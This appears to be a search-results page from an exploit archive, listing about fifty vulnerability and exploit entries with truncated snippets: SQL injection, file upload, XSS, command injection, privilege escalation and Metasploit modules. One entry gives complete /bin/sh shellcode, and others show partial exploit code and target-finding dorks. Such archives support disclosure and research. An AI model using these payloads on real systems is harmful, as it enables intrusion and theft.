39001 matches found
Exam Form Submission System 1.0 - SQL Injection Authentication Bypass Vulneraility
Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass Exploit Author: Nitin Sharma Vidvansh Vendor Homepage: https://code-projects.org Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/ Version: 1.0 Tested on: XAMPP / Windows 10...
Dell DBUtil_2_3.sys IOCTL Memory Read / Write Exploit
The DBUtil23.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker to read and write kernel-mode memory. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Monospace Directus Headless CMS File Upload / Rule Bypass Vulnerabilities
======================================================================= title: Arbitrary File Upload and Bypassing .htaccess Rules product: Monospace Directus Headless CMS vulnerable version: v8.8.2 fixed version: v8.8.2, v9 is not affected because of different architecture CVE number:...
Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Google Dork: inurl:"/vam/indexvamop.php" Exploit Author: Peter Blue Vendor Homepage: https://virtualairlinesmanager.net Software Link:...
SITS:Vision 9.7.0 Authentication Bypass Vulnerability
An authentication bypass vulnerability is present in the stand-alone SITS:Vision component of Tribal SITS in its default configuration, related to unencrypted communications sent by the client each time it is launched. This vulnerability allows unauthenticated attackers to gain access to...
SmartAgent 1.1.0 Server-Side Request Forgery Vulnerability
Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery SSRF Exploit Author: Alter Prime Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com Version: Build v1.1.0 Tested on: Kali Linux An unauthenticated user can trigger the web server to perform web requests to the localho...
Flowmon Unauthenticated Command Injection Exploit
This Metasploit module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Flowmon...
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit
Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit Author: E1 Coders CVE: CVE-2024-21338 require 'msf/core' class MetasploitModule 'CVE-2024-21338 Exploit', 'Description' = 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code...
Electrolink FM/DAB/TV Transmitter Vertical Privilege Escalation Vulnerability
Electrolink FM/DAB/TV Transmitter suffers from a privilege escalation vulnerability. An attacker can escalate his privileges by poisoning the Cookie from GUEST to ADMIN to effectively become Administrator or poisoning to ZSL to become Super Administrator. Electrolink FM/DAB/TV Transmitter Vertica...
Meeting Room Booking System-1.0 Multiple - SQL injection Vulnerability
Title: Meeting Room Booking System-1.0 Multiple - SQLi Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The column parameter appears to b...
Online Piggery Management System v1.0 - unauthenticated file upload Vulnerability
!/bin/bash Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability Exploit Author: 1337kid Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html Version: 1.0 Tested on: Ubuntu CVE : CVE-2023-37629 chmo...
Super Store Finder PHP Script 3.6 SQL Injection Vulnerability
Title : Super Store Finder PHP Script SQL Injection / Bypass admin login Researcher : Etharus Vendor : Joe Iz, https://superstorefinder.net/ Script Demo Url : https://superstorefinder.net/products/superstorefinder/ Version Affected : 3.6 and below Date : 5 July 2023 FOFA Dork : "designed and buil...
Zhuhai Suny Technology ESL Tag Forgery / Replay Attacks Vulnerability
Zhuhai Suny Technology ESL Tag suffers from replay attacks and a forgery attack allowing for the displaying of arbitrary contents. ======================================================================= title: Replay attacks & Displaying arbitrary contents product: Zhuhai Suny Technology ESL Tag ...
Dingtian-DT-R002 3.1.276A - Authentication Bypass Exploit
Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2022-29593/ Vendor Homepage: https://www.dingtian-tech.com/enus/relay4.html Software Link:...
UDisk Monitor Z5 Phone - (MonServiceUDisk.exe) Unquoted Service Path Vulnerability
Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg Vendor Homepage: https://www.zte.com.cn/global/ Tested Version: 2.0.3.0 Vulnerability Type: Unquoted Service Path Tested on OS: Microsoft Window...
Simple Chatbot Application 1.0 - Remote Code Execution Vulnerability
Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution RCE Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html Version: 1.0 Tested on: XAMPP,...
Wordpress MStore API 2.0.6 Plugin - Arbitrary File Upload Vulnerability
Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload Google Dork: inurl:/wp-content/plugins/mstore-api/ Exploit Author: spacehen Vendor Homepage: https://wordpress.org/plugins/mstore-api/ Version: 2.0.6, possibly higher Tested on: Ubuntu 20.04.1 import os.path from os import...
Microsoft RDP Remote Code Execution Exploit
!/usr/bin/python import socket from OpenSSL import from struct import pack, unpack from sys import argv, exit class x224ConnectionRequestPacket: def initself: total of 8 bytes self.rdpNegReq = pack ' 1110 E CDT - 0000 0 for class 0 and 1 0, dest-ref , 2 bytes fuzzable 0, src-ref , 2 bytes fuzzabl...
Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting
Exploit for php platform in category web applications input type="hidden" name="password2" value="newpass1...
HTML Video Player 1.2.5 - Buffer-Overflow (SEH) Exploit
Exploit for windows platform in category local exploits Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow SEH Author: Kağan Çapar Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe Vendor Homepage : http://www.html5videoplayer.net Tested Version: 1.2.5 Tested on OS:...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; // cha...
Umbraco CMS 4.x Arbitrary aspx File Upload Vulnerability
Umbraco CMS version 4.x is vulnerable to a remote code execution vulnerability. An attacker can upload files via an unsecured web service located at /umbraco/webservices/codeEditorSave.asmx method SaveDLRScript. I created this exploit because in some audits the public exploit that juan vazquez...
PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln
Exploit for unknown platform in category web applications ============================================================= PHP-Nuke Module htmltonuke 2.0alpha htmltonuke.php RFI Vuln ============================================================= htmltonuke 2.0alpha for postnuke & PHP-Nukehtmltonuke.p...
ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
Exploit for unknown platform in category web applications =============================================================== ACNews = 1.0 Admin Authentication Bypass SQL Injection Exploit ===============================================================...
Wordpress Background Image Cropper v1.2 Plugin - Remote Code Execution Exploit
Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution Author: Milad Karimi Ex3ptionaL Contact: email protected Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL Vendor Homepage: https://wordpress.org Software Link:...
Cleaning Business Software 1.0 Cross Site Scripting Vulnerability
Title: Cleaning Business Software-1.0 XSS-Reflected Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/cleaning-business-software/sectionDemo Reference: https://portswigger.net/web-security/cross-site-scripting/reflected Description: The value of the ind...
Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Vulnerability
Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL Vendor Homepage: https://jedox.com Version: Jedox 2020.2 20.2.5 and older CVE : CVE-2022-47878 Introduction...
PHPJabbers Simple CMS 5.0 - SQL Injection Vulnerability
Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection Date: 2023-04-29 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpjabbers.com/faq.php Software Link: https://www.phpjabbers.com/simple-cms/ Version: 5.0 Tested on: Kali Linux Request GET...
Auto Dealer Management System v1.0 - SQL Injection Vulnerability (3)
Exploit Title: Auto Dealer Management System v1.0 - SQL Injection on manageuser.php Exploit Author: Muhammad Navaid Zafar Ansari CVE Assigned: CVE-2023-0915 mitre.org nvd.nist.org Vendor Homepage: https://www.sourcecodester.com Software Link: Auto Dealer Management System Version: v 1.0 Tested on...
Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Exploit
Exploit Title: Zoneminder v1.36.26 - Log Injection - CSRF Bypass - Stored Cross-Site Scripting XSS Exploit Author: Trenches of IT Vendor Homepage: https://github.com/ZoneMinder/zoneminder Version: v1.36.26 Tested on: Linux/Windows CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 Writeup:...
Joomla JoomRecipe 4.2.2 Cross Site Scripting Vulnerability
┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploits ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : JoomBoost │ │ Software :...
D-LINK DIR850 - Open Redirect Vulnerability
Exploit Title: DLINK DIR850 - Open Redirect Product: Dlink Model: DIR850 CVE: CVE-2021-46379 Exploit Author: AhmedAlroky Hardware version: b1 Firmware version: ET850-1.08TRb03 Vendor home page: https://www.dlink.com/ Exploit : Visit...
REDCap Cross Site Scripting Vulnerability
REDCap versions prior to 11.4.0 suffer from a persistent cross site scripting vulnerability that can be leveraged to escalate privileges. Exploit Title: REDCap var target = document.location.host; var csrftoken = csrftoken; var userId = ''; // Replace with your user ID. function privesc var xhr =...
Verizon 4G LTE Network Extender 0.4.038.2131 Weak Credential Algorithm Exploit
Verizon's 4G LTE Network Extender is utilizing a weak default admin password generation algorithm. The password is generated using the last 4 values from device's MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the...
WordPress video-synchro-pdf 1.7.4 Plugin - Local File Inclusion Vulnerability
Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/ Version: 1.7.4 Tested on: Firefox Vulnerable...
PHPIPAM 1.4.4 - SQL injection (Authenticated) Exploit
Exploit Title: PHPIPAM 1.4.4 - SQLi Authenticated Google Dork: if applicable Exploit Author: Rodolfo "Inc0gbyt3" Tavares Vendor Homepage: https://github.com/phpipam/phpipam Software Link: https://github.com/phpipam/phpipam Version: 1.4.4 Tested on: Linux/Windows CVE : CVE-2022-23046 import reques...
Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation Vulnerability
Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation Exploit Author: Abdelhamid Naceri Vendor Homepage: www.microsoft.com Tested on: Windows 10 1903 CVE : CVE-2019-1385 Windows: "AppX Deployment Service" AppXSVC elevation of privilege vulnerability Class: Local...
Cisco Expressway Gateway 11.5.1 Directory Traversal Vulnerability
Exploit for hardware platform in category web applications Cisco Expressway Gateway 11.5.1 Directory Traversal Vulnerability Details ======= Product: Cisco Expressway Gateway Affected Versions: 11.5.1, possibly others Fixed Versions: See Cisco Bug ID CSCvo47769 1 Vulnerability Type: Directory...
Helpdezk 1.1.1 - query SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Helpdezk 1.1.1 - 'query' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://www.helpdezk.org/ Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip Version: 1.1.1 Category:...
CSC Cart 4.6.2 Shell Upload Vulnerability
Exploit for php platform in category web applications Summary CSC Cart is a PHP based shopping cart software, which is hosted either locally or by the company csc-cart company. It has a vulnerability in the administration section, which allows full remote code execution on the server. This has be...
reNgine 2.2.0 - Command Injection (Authenticated) Vulnerability
Exploit Title: reNgine 2.2.0 - Command Injection Authenticated Exploit Author: Caner Tercan Vendor Homepage: https://rengine.wiki/ Software Link: https://github.com/yogeshojha/rengine Version: v2.2.0 Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan...
Trimble TM4Web 22.2.0 Privilege Escalation / Access Code Disclosure Vulnerability
An access control issue in Trimble TM4Web version 22.2.0 allows unauthenticated attackers to access a specific crafted URL path to retrieve the last registration access code and use this access code to register a valid account. If the access code was used to create an Administrator account,...
Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure Exploit
Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure Exploit Author: semaja2 Vendor Homepage: https://siklu.com/ Software Link: https://partners.siklu.com/home/frontdoor Version: 2.0.0 Tested on: 2.0.0 CVE : None assigned Instructions 1. Perform IPv6 host detect by...
File Sharing Wizard 1.5.0 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket::INET; Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 07 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing Notificati...
Tinycontrol LAN Controller 3 Remote Credential Extraction Exploit
!/usr/bin/env python Tinycontrol LAN Controller v3 LK3 Remote Credentials Extraction PoC Vendor: Tinycontrol Product web page: https://www.tinycontrol.pl Affected version: this with a calendar when - then. The device provides a user interface in the form of a web page. The website presents readin...
Western Digital MyCloud Unauthenticated Command Injection Exploit
This Metasploit module exploits authentication bypass CVE-2018-17153 and command injection CVE-2016-10108 vulnerabilities in Western Digital MyCloud before 2.30.196 in order to achieve unauthenticated remote code execution as the root user. The module first performs a check to see if the target i...
Wolf CMS 0.8.3.1 - Remote Code Execution Vulnerability
Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution RCE Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://wolf-cms.readthedocs.io Software Link: https://github.com/wolfcms/wolfcms Version: 0.8.3.1 Tested on: Kali Linux Steps to Reproduce Firstly, go to the "Files" tab. Click on the...
pdfkit v0.8.7.2 - Command Injection Exploit
!/usr/bin/env python3 Exploit Title: pdfkit v0.8.7.2 - Command Injection Date: 02/23/2023 Exploit Author: UNICORD NicPWNs & Dev-Yeoj Vendor Homepage: https://pdfkit.org/ Software Link: https://github.com/pdfkit/pdfkit Version: 0.0.0-0.8.7.2 Tested on: pdfkit 0.8.6 CVE: CVE-2022–25765 Source:...
GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin Vulnerability
Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin Application: GLPI Activity 3.1.0 Author: Nuri Çilengir Vendor Homepage: https://glpi-project.org/ Software Link: https://github.com/InfotelGLPI/activity Advisory:...
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion Vulnerability
ADVISORY INFORMATION Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion Date of found: 11 Jun 2022 Application: GLPI Glpiinventory = 1.0.1 Author: Nuri Çilengir Vendor Homepage: https://glpi-project.org/ Software Link:...